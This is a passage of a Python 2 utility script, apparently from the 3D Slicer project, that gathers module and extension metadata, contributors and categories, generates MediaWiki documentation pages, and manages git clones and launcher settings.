| null | 2016-11-22T23:20:51
| 2014-12-23T04:26:16
|
Python
|
UTF-8
|
Python
| false
| false
| 71,479
|
py
|
#!/usr/bin/env python
import codecs
import ConfigParser
import fnmatch
import glob
import git
import io
import itertools
import json
import os
import platform
import re
import subprocess
import sys
import tempfile
import urllib
import urllib2
#---------------------------------------------------------------------------
# Module global variables
class ModuleGlobals(object): pass
__m = ModuleGlobals()
__m.persistent_cache_enabled = False
__m.persistent_cache = {}
__m.cache = {}
#---------------------------------------------------------------------------
def setCacheEntry(key, value):
__m.cache[key] = value
return value
#---------------------------------------------------------------------------
def cacheEntry(key):
return __m.cache[key]
#---------------------------------------------------------------------------
def clearCache():
__m.cache = {}
#---------------------------------------------------------------------------
def persistentCacheEnabled():
return __m.persistent_cache_enabled
#---------------------------------------------------------------------------
def setPersistentCacheEnabled(value):
__m.persistent_cache_enabled = value
#---------------------------------------------------------------------------
def persistentCacheEntry(key):
if persistentCacheEnabled():
return __m.persistent_cache[key]
else:
raise KeyError
#---------------------------------------------------------------------------
def setPersistentCacheEntry(key, value):
__m.persistent_cache[key] = value
savePersistentCache()
return value
#---------------------------------------------------------------------------
def clearPersistentCache():
__m.cache = {}
#---------------------------------------------------------------------------
def getPersistentCacheFilePath():
return os.path.join(tempfile.gettempdir(), os.path.basename(os.path.splitext(__file__)[0])+"-cache")
#---------------------------------------------------------------------------
def savePersistentCache():
with open(getPersistentCacheFilePath(), 'w') as fileContents:
fileContents.write(json.dumps(__m.persistent_cache, sort_keys=True, indent=4))
#---------------------------------------------------------------------------
def loadPersistentCache():
setPersistentCacheEnabled(True)
if not os.path.exists(getPersistentCacheFilePath()):
return
with open(getPersistentCacheFilePath()) as fileContents:
__m.persistent_cache = json.load(fileContents)
#---------------------------------------------------------------------------
def connectToSlicerWiki(username='UpdateBot', password=None):
"""
:param username:
Username to login to the Slicer wiki. The user should be granted the right to use the wiki API.
:type username:
:class:`basestring`
:param password:
Password to login to Slicer wiki.
:type password:
:class:`basestring`
:returns: Site object allowing to interact with the wiki.
:rtype: :class:`mwclient.Site <mwclient:mwclient.client.Site>`
"""
return connectToWiki(username, password, 'www.slicer.org', '/w/')
#---------------------------------------------------------------------------
def connectToWikiByName(name):
try:
wiki = cacheEntry('wiki-{0}'.format(name))
except KeyError:
username = cacheEntry("wiki-{0}-username".format(name))
password = cacheEntry("wiki-{0}-password".format(name))
host = cacheEntry("wiki-{0}-host".format(name))
path = cacheEntry("wiki-{0}-path".format(name))
wiki = setCacheEntry('wiki-{0}'.format(name),
connectToWiki(username, password, host, path))
return wiki
#---------------------------------------------------------------------------
def connectToWiki(username, password, host, path):
"""
:returns: Site object allowing to interact with the wiki.
:rtype: :class:`mwclient.Site <mwclient:mwclient.client.Site>`
"""
import mwclient
site = mwclient.Site(host, path=path)
site.login(username, password)
print("\nConnected to '{host}{path}' as user '{username}'".format(
host=site.host, path=site.path, username=username))
return site
#---------------------------------------------------------------------------
def convertTitleToWikiAnchor(title):
"""Convert section title into a identifier that can be used to reference
the section in link.
:param title:
Section title
:type title:
:class:`basestring`
:returns: Anchor that can be used to reference the associated section.
:rtype: :class:`basestring`
"""
# Following snippet has been adapted from mediawiki code base
# 1) normalize
title = re.sub(r'[ _]+', ' ', title)
# 2) See Title::newFromText in mediawiki
title = title.replace(' ', '_')
# * decodeCharReferencesAndNormalize: Convert things like é ā or 〗 into normalized text
# XXX title = decodeCharReferencesAndNormalize(title)
# * Strip Unicode bidi override characters.
title = re.sub(r'\xE2\x80[\x8E\x8F\xAA-\xAE]', '', title)
# * Clean up whitespace
# XXX title = re.sub(r'[ _\xA0\x{1680}\x{180E}\x{2000}-\x{200A}\x{2028}\x{2029}\x{202F}\x{205F}\x{3000}]', '_', title)
title = title.strip('_')
# 2) See Title::getFragmentForURL -> Title::escapeFragmentForURL -> Sanitized::escapeId
title = re.sub(r'[ \t\n\r\f_\'"&#%]', '_', title)
title = title.strip('_')
title = urllib.quote_plus(title)
# * HTML4-style escaping
title = title.replace('%3A', ':')
title = title.replace('%', '.')
return title
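# Example (illustrative): convertTitleToWikiAnchor("Modules by category")
# returns "Modules_by_category", which the section generators below reference
# as "#Modules_by_category" in the produced wiki links.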
#---------------------------------------------------------------------------
def extractExtensionName(descriptionFile):
return os.path.basename(os.path.splitext(descriptionFile)[0])
#---------------------------------------------------------------------------
def prettify(name):
"""Source: http://stackoverflow.com/questions/5020906/python-convert-camel-case-to-space-delimited-using-regex-and-taking-acronyms-in
"""
name = re.sub(r'^Slicer(Extension)?[\-\_]', "", name)
#return re.sub("([a-z])([A-Z])","\g<1> \g<2>", name).replace('_', ' ')
return name
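# Examples (illustrative, hypothetical names): prettify("SlicerExtension-MyTool")
# returns "MyTool" and prettify("Slicer_MyTool") returns "MyTool"; names without
# the "Slicer"/"SlicerExtension" prefix are returned unchanged.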
#---------------------------------------------------------------------------
def getDescriptionFiles(extensionsIndexDir, skip = []):
s4extFiles = []
files = os.listdir(extensionsIndexDir)
for descriptionFile in files:
if not fnmatch.fnmatch(descriptionFile, '*.s4ext'):
continue
if extractExtensionName(descriptionFile) in skip:
continue
s4extFiles.append(os.path.join(extensionsIndexDir, descriptionFile))
return s4extFiles
#---------------------------------------------------------------------------
def getExtensionHomepages(files):
import SlicerWizard as sw
print("\nCollecting extension homepage links")
homepages = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
homepages[name] = desc.homepage
return homepages
#---------------------------------------------------------------------------
def wikiPageExists(wikiName, page):
try:
exist = persistentCacheEntry(page)
except KeyError:
wiki = connectToWikiByName(wikiName)
exist = setPersistentCacheEntry(page, wiki.Pages[page].exists)
return exist
#---------------------------------------------------------------------------
WIKI_LINK_INTERNAL = 0
WIKI_LINK_EXTERNAL = 1
WIKI_LINK_OFF = 2
#---------------------------------------------------------------------------
def wikiPageToWikiLink(page, name=None):
if not name:
return "[[{}]]".format(page)
else:
return wikiPageToWikiLink("{0}|{1}".format(page, name))
#---------------------------------------------------------------------------
def urlToWikiLink(url, name):
return "[{0} {1}]".format(url, name)
#---------------------------------------------------------------------------
def _generateWikiLink(type_, what, name, linkName, url=None, slicerVersion=None):
if type_ == WIKI_LINK_INTERNAL:
if not slicerVersion:
raise RuntimeError, ("slicerVersion parameter is required when "
"specifying WIKI_LINK_INTERNAL wiki link type.")
release = getSlicerReleaseIdentifier(slicerVersion)
page = "Documentation/{release}/{what}/{name}".format(
release=release, what=what, name=name)
return wikiPageToWikiLink(page, linkName)
elif type_ == WIKI_LINK_EXTERNAL:
return urlToWikiLink(url, linkName)
else: # WIKI_LINK_OFF
return linkName
#---------------------------------------------------------------------------
def _createLinkItem(type_, what, name, linkName, url=None, slicerVersion=None):
return {'name' : name,
'wikilink' : _generateWikiLink(type_, what, name, linkName, url=url, slicerVersion=slicerVersion),
'type' : type_,
'url' : url}
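# For example (illustrative, assuming getSlicerReleaseIdentifier returns "4.4"
# for the given version string), _createLinkItem(WIKI_LINK_INTERNAL, 'Modules',
# 'MyModule', 'MyModule', slicerVersion='Slicer 4.4.0') would return:
#   {'name': 'MyModule',
#    'wikilink': '[[Documentation/4.4/Modules/MyModule|MyModule]]',
#    'type': WIKI_LINK_INTERNAL,
#    'url': None}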
#---------------------------------------------------------------------------
def generateItemWikiLinks(what, wikiName, homepages, slicerVersion=None):
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
releaseIdentifier = getSlicerReleaseIdentifier(slicerVersion)
print("\nGenerating {0} wiki links for Slicer {1}:".format(what, releaseIdentifier))
wikiLinks = {}
for idx, (name, homepage) in enumerate(homepages.iteritems()):
if idx % 5 == 0:
print(" {:.0%}".format(float(idx) / len(homepages)))
item = _createLinkItem(WIKI_LINK_INTERNAL, what, name, prettify(name), slicerVersion=slicerVersion)
# If wiki page does NOT exist use the homepage link provided in the description file
if not wikiPageExists(wikiName, "Documentation/{0}/{1}/{2}".format(releaseIdentifier, what, name)):
if homepage:
item = _createLinkItem(WIKI_LINK_EXTERNAL, what, name, prettify(name), url=homepage)
else:
item = _createLinkItem(WIKI_LINK_OFF, what, name, prettify(name))
wikiLinks[name] = item
return wikiLinks
#---------------------------------------------------------------------------
def saveWikiPage(wikiName, name, summary, content):
wiki = connectToWikiByName(wikiName)
page = wiki.Pages[name]
return page.save(content, summary=summary)
#---------------------------------------------------------------------------
def getCategoryItems(itemCategories):
#----------------------------------------------------------------------
def _getParentCategory(category):
subModuleCategories = category.split('.')
parentCategory = subcategories
for subModuleCategory in subModuleCategories:
if subModuleCategory not in parentCategory:
parentCategory[subModuleCategory] = {}
parentCategory[subModuleCategory]['_ITEMS_'] = []
parentCategory = parentCategory[subModuleCategory]
return parentCategory
subcategories = {}
for name in itemCategories:
categories = ['Uncategorized']
if len(itemCategories[name]) > 0:
categories = itemCategories[name]
for category in categories:
# Skip empty category
if not category.strip():
continue
# Consider sub-categories
parentCategory = _getParentCategory(category)
parentCategory['_ITEMS_'].append(name)
return subcategories
#---------------------------------------------------------------------------
def getModuleCategories(modulesMetadata):
print("\nCollecting module 'categories'")
return {name: modulesMetadata[name]['categories'] for name in modulesMetadata}
#---------------------------------------------------------------------------
def getExtensionCategories(files):
import SlicerWizard as sw
print("\nCollecting extension 'categories'")
categories = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
categories[name] = []
if hasattr(desc, 'category') and desc.category.strip():
categories[name] = [desc.category]
return categories
#---------------------------------------------------------------------------
def _appendToDictValue(dict_, key, value, allowDuplicate=True):
if key not in dict_:
dict_[key] = []
append = True
if not allowDuplicate and value in dict_[key]:
append = False
if append:
dict_[key].append(value)
#---------------------------------------------------------------------------
def parseContributors(name, contributors):
# XXX This has been copied from [1]
# [1] https://github.com/Slicer/Slicer/blob/a8a01aa29210f938eaf48bb5c991681c3c67632d/Modules/Scripted/ExtensionWizard/ExtensionWizardLib/EditExtensionMetadataDialog.py#L101
def _parseIndividuals(individuals):
# Clean inputs
individuals = individuals.replace("This tool was developed by", "")
# Split by ',' and 'and', then flatten the list using itertools
individuals=list(itertools.chain.from_iterable(
[individual.split("and") for individual in individuals.split(",")]))
# Strip spaces and dot from each individuals and remove empty ones
individuals = filter(None, [individual.strip().strip(".") for individual in individuals])
return individuals
def _parseOrganization(organization):
try:
c = organization
c = c.strip()
n = c.index("(")
individuals = _parseIndividuals(c[:n].strip())
organization = c[n+1:-1].strip()
except ValueError:
individuals = _parseIndividuals(organization)
organization = ""
return (organization, individuals)
def _parseContributors(contributors):
orgs = re.split("(?<=[)])\s*,", contributors)
for c in orgs:
c = c.strip()
if not c:
print(" {0}: no contributors".format(name))
continue
(organization, individuals) = _parseOrganization(c)
for individual in individuals:
if individual == "":
print(" {0}: organization {1} has no individuals".format(name, organization))
continue
_appendToDictValue(orgToIndividuals, organization, individual)
_appendToDictValue(individualToOrgs, individual, organization)
orgToIndividuals = {}
individualToOrgs = {}
# Split by organization
if isinstance(contributors, basestring):
contributors = [contributors]
for contributor in contributors:
_parseContributors(contributor)
return (orgToIndividuals, individualToOrgs)
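# Example (illustrative, hypothetical names):
#   parseContributors('MyExtension', 'John Doe (Acme Corp), Jane Roe (Example Lab)')
# returns
#   ({'Acme Corp': ['John Doe'], 'Example Lab': ['Jane Roe']},
#    {'John Doe': ['Acme Corp'], 'Jane Roe': ['Example Lab']})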
#---------------------------------------------------------------------------
def getExtensionContributors(files):
import SlicerWizard as sw
print("\nCollecting extension 'contributors'")
contributors = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
if not hasattr(desc, 'contributors'):
print(" skipping %s: missing contributors field" % name)
continue
contributors[name] = desc.contributors
return contributors
#---------------------------------------------------------------------------
def getModuleContributors(modulesMetadata):
print("\nCollecting module 'contributors'")
return {name: modulesMetadata[name]['contributors'] for name in modulesMetadata}
#---------------------------------------------------------------------------
def getContributingOrganizationsAndIndividuals(itemContributors):
organizationItems = {}
individualItems = {}
itemOrganizations = {}
individualOrganizations = {}
for itemName, contributors in itemContributors.iteritems():
(orgToIndividuals, individualToOrgs) = parseContributors(itemName, contributors)
for organization in orgToIndividuals.keys():
_appendToDictValue(organizationItems, organization, itemName)
itemOrganizations[itemName] = orgToIndividuals
for individual in individualToOrgs.keys():
_appendToDictValue(individualItems, individual, itemName)
orgs = individualToOrgs[individual]
for org in orgs:
if org:
_appendToDictValue(individualOrganizations, individual, org, allowDuplicate=False)
return (organizationItems, individualItems, itemOrganizations, individualOrganizations)
#---------------------------------------------------------------------------
def sortKeys(dict_, prettifyKey=False):
"""Return list of sorted dictionnary keys.
"""
def _updateKey(s):
s = s.lower()
if prettifyKey:
s = prettify(s)
return s
return sorted(dict_, key=_updateKey)
#---------------------------------------------------------------------------
def sortPrettifiedKeys(dict_):
"""Return list of sorted dictionnary keys.
"""
return sortKeys(dict_, prettifyKey=True)
#---------------------------------------------------------------------------
def generateContributorsWikiLinks(extensionName, organizations):
for org in sortPrettifiedKeys(organizations):
orgLink = "[[#{}|{}]]".format(org, org)
for individual in sortPrettifiedKeys(organizations[org]):
individualLink = "[[#{}|{}]]".format(individual, individual)
#---------------------------------------------------------------------------
def tocEntryAsWikiListItem(name, level=0, anchor=None, extras=[]):
return linkAsWikiListItem(
wikiPageToWikiLink('#' + convertTitleToWikiAnchor(name if anchor is None else anchor), prettify(name)),
level, extras)
#---------------------------------------------------------------------------
def individualEntryAsWikiListItem(name, level=0):
extras = []
individualOrganizations = cacheEntry("individualOrganizations")
if name in individualOrganizations:
if individualOrganizations[name]:
extras.append(individualOrganizations[name][0])
return tocEntryAsWikiListItem(name, level, extras=extras)
#---------------------------------------------------------------------------
def headerForWikiList(title, teaser):
lines = []
lines.append(u"= {} =".format(title))
lines.extend(teaser)
return lines
#---------------------------------------------------------------------------
def linkAsWikiListItem(link, level=0, extras=[]):
wikilink = link
if isinstance(link, dict):
wikilink = link['wikilink']
extraTxt = " <small>({})</small>".format(", ".join(extras)) if extras else ""
return "{0} {1}{2}".format("*"*(level+1), wikilink, extraTxt)
#---------------------------------------------------------------------------
def footerForWikiList(title, teaser):
return []
#---------------------------------------------------------------------------
def moduleLinkAsListItem(link, level=0):
name = link['name']
extras = []
moduleTypes = cacheEntry("moduleTypes")
moduleExtensions = cacheEntry("moduleExtensions")
if name in moduleExtensions:
extensionName = moduleExtensions[name]
extensionLinks = cacheEntry("extensionLinks")
# type (cli, loadable, scripted)
extras.append(moduleTypes[name])
# provenance (built-in or extension)
if extensionName in extensionLinks:
extras.append("bundled in {} extension".format(extensionLinks[extensionName]['wikilink']))
elif extensionName == 'builtin':
extras.append("built-in")
return linkAsWikiListItem(link, level, extras)
#---------------------------------------------------------------------------
linksAsWikiList = (headerForWikiList, linkAsWikiListItem, footerForWikiList)
# #---------------------------------------------------------------------------
# def headerForWikiTable():
# pass
#
# #---------------------------------------------------------------------------
# def linkAsWikiTableEntry():
# pass
#
# #---------------------------------------------------------------------------
# def headerForWikiTable():
# pass
#---------------------------------------------------------------------------
# linksAsWikiTable = (headerForWikiTable, linkAsWikiTableEntry, headerForWikiTable)
#---------------------------------------------------------------------------
def itemByCategoryToWiki(what, links, categories, linksRenderer=linksAsWikiList,
tocEntryRenderer=tocEntryAsWikiListItem, withToc=False):
def _traverse(categories, lines, categoryCallback,
itemCallback=None,
category=None, completeCategory=None,
level=-1,
lookup=lambda item:item):
if category:
categoryAnchor = sectionAnchor + '_' + convertTitleToWikiAnchor(completeCategory)
lines.append(categoryCallback(category, level, categoryAnchor))
if itemCallback and '_ITEMS_' in categories:
for item in categories['_ITEMS_']:
lines.append(itemCallback(lookup(item)))
for subcategory in sortKeys(categories):
if subcategory == '_ITEMS_':
continue
level = level + 1
_traverse(categories[subcategory], lines, categoryCallback,
itemCallback=itemCallback,
category=subcategory,
completeCategory=subcategory if category is None else category + '_' + subcategory,
level=level, lookup=lookup)
level = level - 1
title = "{0} by category".format(what)
print("\nGenerating '%s' section" % title)
sectionAnchor = convertTitleToWikiAnchor(title)
teaser = []
if withToc:
teaser.append("{} categories:".format(len(categories)))
_traverse(categories, teaser, tocEntryRenderer)
else:
teaser.append("{} categories".format(len(categories)))
lines = []
lines.extend(headerForWikiList(title, teaser))
# content
_traverse(categories, lines,
lambda category, level, anchor:
u"<span id='{}'></span>\n".format(anchor) +
u"{0} {1} {0}".format("="*(level+2), category),
itemCallback=linksRenderer[1], lookup=lambda item:links[item])
return (title, '#' + sectionAnchor, lines)
#---------------------------------------------------------------------------
def itemByNameToWiki(what, links, linksRenderer=linksAsWikiList):
title = "{0} by name".format(what)
print("\nGenerating '{0}' section".format(title))
teaser = ["{0} {1}:".format(len(links), what.lower())]
lines = []
lines.extend(linksRenderer[0](title, teaser))
for name in sortPrettifiedKeys(links):
lines.append(linksRenderer[1](links[name]))
lines.extend(linksRenderer[2](title, teaser))
return (title, '#' + convertTitleToWikiAnchor(title), lines)
#---------------------------------------------------------------------------
def itemByPropertyToWiki(what, links, description, items,
linksRenderer=linksAsWikiList,
tocEntryRenderer=tocEntryAsWikiListItem, withToc=False):
title = "{0} by {1}".format(what, description)
print("\nGenerating '%s' section" % title)
teaser = []
if withToc:
teaser.append("{0} {1}s:".format(len(items), description))
for name in sortKeys(items):
if not name or len(items[name]) == 0:
continue
teaser.append(tocEntryRenderer(name))
else:
teaser.append("{0} {1}s".format(len(items), description))
lines = []
lines.extend(linksRenderer[0](title, teaser))
for item in sortKeys(items):
if item != "" and len(items[item]) > 0:
lines.append("== {} ==".format(item))
for name in sortPrettifiedKeys(items[item]):
if item == "":
print(u" skipping {0}: missing '{1}'".format(name, description))
continue
lines.append(linksRenderer[1](links[name]))
lines.extend(linksRenderer[2](title, teaser))
return (title, '#' + convertTitleToWikiAnchor(title), lines)
#---------------------------------------------------------------------------
def getMetadataFiles(prefix):
"""Return a list of files associated with ``prefix``.
"""
targetDir = getPackagesMetadataDataDirectory()
print("\nScanning directory '{0}' using prefix '{1}'".format(targetDir, prefix))
files = glob.glob(os.path.join(targetDir, '{0}_*.json'.format(prefix)))
print("\nFound {0} file(s) matching prefix '{1}'".format(len(files), prefix))
for file in files:
print(" {}".format(file))
return files
#---------------------------------------------------------------------------
def _merge(a, b, path=None):
"Merge b into a"
# See http://stackoverflow.com/a/7205107/1539918
if path is None: path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
_merge(a[key], b[key], path + [str(key)])
elif isinstance(a[key], list) and isinstance(b[key], list):
a[key] = list(set(a[key] + b[key]))
elif a[key] == b[key]:
pass # same leaf value
else:
raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))
else:
a[key] = b[key]
return a
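# Example (illustrative): _merge({'extensions': {'A': ['x86_64']}},
#                                {'extensions': {'A': ['amd64'], 'B': ['x86_64']}})
# merges list values as a set union and adds missing keys, giving
#   {'extensions': {'A': ['x86_64', 'amd64'], 'B': ['x86_64']}}
# (list order is not guaranteed); conflicting scalar leaves raise an Exception.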
#---------------------------------------------------------------------------
def mergeMetadataFiles(prefix):
"""Return a merged dictonnary of all metadata files associated with ``prefix``.
"""
#-----------------------------------------------------------------------
def _readJson(filePath):
with codecs.open(filePath, 'r', 'utf-8') as fileContents:
return json.load(fileContents)
return reduce(_merge, [_readJson(filePath) for filePath in getMetadataFiles(prefix)])
#---------------------------------------------------------------------------
def cloneRepository(git_url, repo_dir, branch='master'):
"""Clone ``git_url`` into ``repo_dir`` and return a reference to it.
If a clone already exists, local changes are discarded and ``branch``
is checked out. Then, a reference to the clone is returned.
"""
if not os.path.isdir(repo_dir):
git.Repo.clone_from(git_url, repo_dir)
print("Cloned '{0}' into '{1}'".format(git_url, repo_dir))
repo = git.Repo(repo_dir)
print("\nFound '{0}' in '{1}'".format(git_url, repo.working_dir))
checkoutBranch(repo, branch)
return repo
#---------------------------------------------------------------------------
def checkoutBranch(repo, branch):
"""Discard local ``repo`` changes, fetch remote changes and checkout
``branch``.
"""
print("\nDiscarding local changes in '{}'".format(repo.working_dir))
# Discard local changes
repo.git.reset('--hard','HEAD')
# Fetch changes
origin = repo.remotes.origin
print("\nFetching changes from '{}'".format(origin.url))
origin.fetch()
# Checkout branch and update branch
repo.git.checkout(branch)
print("\nApplying changes")
repo.git.reset('--hard','origin/{}'.format(branch))
#---------------------------------------------------------------------------
SLICER_PACKAGES_METADATA_GIT_URL = 'git@github.com:Slicer/slicer-packages-metadata'
SLICER_EXTENSIONS_INDEX_GIT_URL = 'git://github.com/Slicer/ExtensionsIndex'
#---------------------------------------------------------------------------
def getPackagesMetadataTopLevelDirectory():
return os.path.join(tempfile.gettempdir(), 'slicer-packages-metadata')
#---------------------------------------------------------------------------
def getPackagesMetadataDataDirectory():
metadataDir = os.path.join(getPackagesMetadataTopLevelDirectory(), 'metadata')
if not os.path.exists(metadataDir):
os.makedirs(metadataDir)
return metadataDir
#---------------------------------------------------------------------------
def getExtensionsIndexTopLevelDirectory():
return os.path.join(tempfile.gettempdir(), 'slicer-extensions-index')
#---------------------------------------------------------------------------
def getModuleLinks(wikiName, modulesMetadata, slicerVersion=None):
moduleLinks = \
generateItemWikiLinks('Modules', wikiName,
{name:"" for name in modulesMetadata.keys()}, slicerVersion)
return moduleLinks
#---------------------------------------------------------------------------
def getExtensionLauncherAdditionalSettingsFromBuildDirs(slicerExtensionsIndexBuildDir):
launcherSettingsFiles = []
for dirname in os.listdir(slicerExtensionsIndexBuildDir):
extensionBuildDir = os.path.join(slicerExtensionsIndexBuildDir, dirname)
if os.path.isdir(extensionBuildDir):
if dirname.endswith('-build'):
launcherSettings = getExtensionLauncherSettings(extensionBuildDir)
if launcherSettings is not None:
launcherSettingsFiles.append(launcherSettings)
return launcherSettingsFiles
#---------------------------------------------------------------------------
def _readLauncherSettings(settingsFile):
"""This function read the given ``settingsFile``, trim all lines
and return the corresponding buffer.
.. note::
This function is needed for Slicer < r24174. For new version of Slicer,
the settings generation has been fixed.
"""
updatedFileContents = []
with open(settingsFile) as fileContents:
for line in fileContents:
updatedFileContents.append(line.lstrip().rstrip('\n'))
return '\n'.join(updatedFileContents)
#---------------------------------------------------------------------------
def readAdditionalLauncherSettings(settingsFile, configs):
"""Read ``settingsFile`` and populate the provided ``configs`` dictionnary.
"""
parser = ConfigParser.ConfigParser()
settingsFileContents = _readLauncherSettings(settingsFile)
parser.readfp(io.BytesIO(settingsFileContents))
for section in ['LibraryPaths', 'Paths', 'PYTHONPATH', 'QT_PLUGIN_PATH']:
if not parser.has_section(section):
continue
if section not in configs:
configs[section] = []
for idx in range(parser.getint(section, 'size')):
configs[section].append(parser.get(section, '{0}\\path'.format(idx+1)))
#---------------------------------------------------------------------------
def writeLauncherAdditionalSettings(outputSettingsFile, configs):
"""Write ``outputSettingsFile`` using provided ``configs`` dictionnary.
"""
with open(outputSettingsFile, 'w') as fileContents:
def _writeSection():
fileContents.write('[{0}]\n'.format(section))
items = configs[section]
size = len(items)
for idx in range(size):
fileContents.write('{0}\\path={1}\n'.format(idx+1, items[idx]))
fileContents.write('size={0}\n'.format(size))
for section in configs:
_writeSection()
fileContents.write('\n')
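# For example (illustrative path), configs = {'Paths': ['/opt/myext/bin']} is written as:
#   [Paths]
#   1\path=/opt/myext/bin
#   size=1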
#---------------------------------------------------------------------------
def mergeExtensionsLauncherAdditionalSettings(slicerExtensionsIndexBuildDir):
mergedSettingsFile = getPackagesMetadataTopLevelDirectory() + "AdditionalLauncherSettings.ini"
print("\nCreating {0}".format(mergedSettingsFile))
# Read extension launcher additional settings
settingsFiles = getExtensionLauncherAdditionalSettingsFromBuildDirs(slicerExtensionsIndexBuildDir)
configs = {}
for settingsFile in settingsFiles:
readAdditionalLauncherSettings(settingsFile, configs)
# Write common launcher additional settings
writeLauncherAdditionalSettings(mergedSettingsFile, configs)
return mergedSettingsFile
#---------------------------------------------------------------------------
def getSlicerLauncher(slicerBuildDir):
launcher = os.path.join(slicerBuildDir, _e('Slicer'))
if not os.path.exists(launcher):
return None
return launcher
#---------------------------------------------------------------------------
def _e(name):
"""Append the executable suffix corresponding to the platform running
this script.
"""
return name if not sys.platform.startswith('win') else name + '.exe'
#---------------------------------------------------------------------------
def installPip(slicerBuildDir=None):
url = 'https://bootstrap.pypa.io/get-pip.py'
filePath = os.path.basename(url)
print("\nDownloading '{0}' into '{1}'".format(url, filePath))
response = urllib2.urlopen(url)
with open(filePath, "wb") as fileContents:
fileContents.write(response.read())
# XXX See https://github.com/commontk/AppLauncher/issues/57
pythonExecutable = _e('python')
if sys.platform == 'darwin':
pythonExecutable = os.path.join(slicerBuildDir, '../python-install/bin/python')
print("\nInstalling pip")
slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--launch', pythonExecutable, filePath])
#---------------------------------------------------------------------------
def runPip(args, slicerBuildDir=None):
def _runPip():
print("\npip {0}".format(" ".join(args)))
slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--launch', _e('pip')] + args)
try:
_runPip()
except RuntimeError:
installPip(slicerBuildDir)
_runPip()
#---------------------------------------------------------------------------
def slicerLauncherPopen(launcher, args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs):
if launcher is None:
args.pop(0) # Ignore '--launch' argument
print("\nStarting {0}".format(" \\\n ".join(args)))
else:
print("\nStarting {0} {1}".format(launcher, " \\\n ".join(args)))
p = subprocess.Popen([launcher] + args, stdout=stdout, stderr=stderr, **kwargs)
ec = p.wait()
if ec:
raise RuntimeError, "Calling {0} failed (exit code {1})".format(launcher, ec)
return p
#---------------------------------------------------------------------------
def getSlicerVersion(slicerBuildDir):
p = slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--version'])
if p is None:
return None
version = p.stdout.read().strip() # Slicer X.Y.Z[-YYYY-MM-DD]
print("\nAuto-discovered version is '{0}' [major.minor:{1}, release:{2}]".format(
version,
getSlicerMajorMinorVersion(version),
isSlicerReleaseVersion(version)))
return version
#---------------------------------------------------------------------------
def getSlicerMajorMinorVersion(slicerVersion):
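    """Extract the '<major>.<minor>' part from a version string of the form
    'Slicer X.Y[.Z][-...]', e.g. 'Slicer 4.4.1-2014-12-23' -> '4.4'.
    """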
version = re.findall(r'^Slicer (\d\.\d)', slicerVersion)[0]
return version
#---------------------------------------------------------------------------
def isSlicerReleaseVersion(slicerVersion):
"""Return True if the given slicer version corresponds to a
Slicer release.
>>> isSlicerReleaseVersion('foo')
False
>>> [isSlicerReleaseVersion('Slicer {}'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[True, True, True]
>>> [isSlicerReleaseVersion('Slicer {}-2014-12-23'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-SomeText'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-A'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-0'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, True, False]
"""
return re.match(r'^Slicer \d\.\d(\.\d(\-\d)?)?$', slicerVersion) is not None
#---------------------------------------------------------------------------
def getModuleDirectories(basePath, slicerMajorMinorVersion):
"""Recursively walk ``basepath`` directory and return the list of directory expected
to contain cli, scripted or loadable modules.
"""
output = []
for subdir in ['cli-modules', 'qt-loadable-modules', 'qt-scripted-modules']:
moduleDir = os.path.join(basePath, 'lib', 'Slicer-{0}'.format(slicerMajorMinorVersion), subdir)
if os.path.isdir(moduleDir):
output.append(moduleDir)
if os.path.isdir(basePath) and os.path.basename(basePath) not in ['_CPack_Packages']:
for dirname in os.listdir(basePath):
output.extend(getModuleDirectories(os.path.join(basePath, dirname), slicerMajorMinorVersion))
return output
#---------------------------------------------------------------------------
def getExtensionLauncherSettings(extensionBuildDir):
"""Recursively walk an extension build directory until a file named
`AdditionalLauncherSettings.ini` is found.
"""
for filename in os.listdir(extensionBuildDir):
filepath = os.path.join(extensionBuildDir, filename)
if filename == 'AdditionalLauncherSettings.ini':
return filepath
elif not os.path.isdir(filepath):
continue
else:
return getExtensionLauncherSettings(filepath)
#---------------------------------------------------------------------------
def isCLIExecutable(filePath):
import ctk_cli
result = ctk_cli.isCLIExecutable(filePath)
if not result:
return False
moduleName = extractCLIModuleName(filePath)
# for pattern in ['Test$']:
# if re.search(pattern, moduleName, flags=re.IGNORECASE) is not None:
# return False
return True
#---------------------------------------------------------------------------
def extractCLIModuleName(filePath):
name = os.path.basename(filePath)
if name.endswith('.exe'):
        name = name[:-4]
return name
#---------------------------------------------------------------------------
def isLoadableModule(filePath):
return extractLoadableModuleName(filePath) is not None
#---------------------------------------------------------------------------
def extractLoadableModuleName(filePath):
# See qSlicerUtils::isLoadableModule
result = re.match("(?:libqSlicer(.+)Module\\.(?:so|dylib))|(?:(?!lib)qSlicer(.+)Module\\.(?:dll|DLL))", os.path.basename(filePath))
name = None
if result is not None:
name = result.group(1) if result.group(1) is not None else result.group(2)
return name
#---------------------------------------------------------------------------
def isScriptedModule(filePath):
isScript = os.path.splitext(filePath)[-1] == '.py'
if not isScript:
return False
moduleName = extractScriptedModuleName(filePath)
for pattern in ['Plugin', 'SelfTest', 'Test', '\d{4}', 'Tutorial']:
if re.search(pattern, moduleName, flags=re.IGNORECASE) is not None:
return False
return moduleName
#---------------------------------------------------------------------------
def extractScriptedModuleName(filePath):
return os.path.splitext(os.path.basename(filePath))[0]
#---------------------------------------------------------------------------
def _getModuleNames(tester, extractor, buildDir):
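    """Return the names of modules found directly in ``buildDir``.
    ``tester`` decides whether a given file is a module of the expected type
    and ``extractor`` maps the corresponding file path to a module name.
    """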
names = []
for path in os.listdir(buildDir):
filePath = os.path.join(buildDir, path)
